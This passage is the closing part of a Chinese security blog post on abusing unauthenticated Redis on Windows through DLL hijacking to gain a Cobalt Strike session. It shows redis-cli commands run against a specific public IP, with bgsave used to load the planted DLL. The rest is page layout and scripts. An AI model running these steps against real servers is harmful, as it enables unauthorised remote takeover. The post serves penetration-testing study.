恢复原始文件名: +OK</span><br><span class="line"></span><br><span class="line"><span class="comment">#连接靶机redis 执行命令加载DLL</span></span><br><span class="line">root@hcss-ecs-0abd:/home/Redis_Server/RedisWriteFile-master<span class="comment"># redis-cli -h 39.98.110.252</span></span><br><span class="line">39.98.110.252:6379&gt; bgsave</span><br><span class="line">Background saving started</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>然后就可以看到靶机上线CS了</p>
<h3 id="不出网情况"><a class="markdownIt-Anchor" href="#不出网情况"></a> 不出网情况</h3>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/13892">Windows Redis DLL劫持在实战中的利用-先知社区</a></p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/" rel="tag">Redis未授权访问</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/bg1.jpg" data-sizes="auto" alt="[Vulnhub靶机通关]DC-2" class="lazyload">
          
        
        <a href="/2026/01/25/%5BVulnhub%E9%9D%B6%E6%9C%BA%E9%80%9A%E5%85%B3%5DDC-2/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            [Vulnhub靶机通关]DC-2
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/images/bizhi1.png" data-sizes="auto" alt="面经" class="lazyload">
        
      
      <a href="/2026/01/06/%E9%9D%A2%E7%BB%8F/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          面经
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2026
      <span class="footer-info-sep rotate"></span>
      FuB0Y
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        1183.5k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        94:33
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#windows%E7%8E%AF%E5%A2%83redis-dll%E5%8A%AB%E6%8C%81%E4%B8%8A%E7%BA%BFcs"><span class="toc-number">1.</span> <span class="toc-text"> Windows环境Redis DLL劫持上线CS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text"> 利用原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#dll%E5%8A%AB%E6%8C%81%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.1.</span> <span class="toc-text"> DLL劫持原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8A%AB%E6%8C%81dbghelpdll"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 劫持dbghelp.dll</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E8%BD%AC%E5%8F%91%E5%8A%AB%E6%8C%81"><span class="toc-number">1.1.3.</span> <span class="toc-text"> 函数转发劫持</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB"><span class="toc-number">1.2.</span> <span class="toc-text"> 攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%8D%E5%87%BA%E7%BD%91%E6%83%85%E5%86%B5"><span class="toc-number">1.3.</span> <span class="toc-text"> 不出网情况</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">382</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">323</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.0.6/dist/index.umd.js" integrity="sha384-vkGvf25gm1C1PbcoD5dNfc137HzNL&#x2F;hr1RKA5HniJOaawtvUmH5lTVFgFAruE9Ge" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "FuB0Y",
          title: "Windows环境Redis未授权访问漏洞利用",
          url: "https://fub0y2026.github.io/2026/01/15/Windows%E7%8E%AF%E5%A2%83Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/",
          excerpt: "",
          description: "",
          stripContent: "总：Redis在Windows环境下Getshell方法小结-腾讯云开发者社区-腾讯云 这里暂且先提一下DLL劫持上线CS  Windows环境Redis DLL劫持上线CS  利用原理 参考文章： Windows中redis未授权通过dll劫持上线 - 我要变超人 - 博客园 Windows Redis DLL劫持在实战中的利用-先知社区  DLL劫持原理 DLL：Windows的动态链接库，简单来说，就是一部分Windows平台下的通用代码并没有写在程序里，而是当程序需要使用时去DLL里调用",
          date: "Thu Jan 15 2026 12:55:27 GMT+0800",
          updated: "Thu Jan 15 2026 12:59:47 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.js" integrity="sha384-7zkQWkzuo3B5mTepMUcHkMB5jZaolc2xDwL6VFqjFALcbeS9Ggm&#x2F;Yr2r3Dy4lfFg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/contrib/auto-render.min.js" integrity="sha384-43gviWU0YVjaDtb&#x2F;GhzOouOXtZMP&#x2F;7XUzwPTstBeZFe&#x2F;+rCMvRwr4yROQP43s0Xk" crossorigin="anonymous" defer onload="renderMathInElement(document.body, {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  





  </body>
  </html>

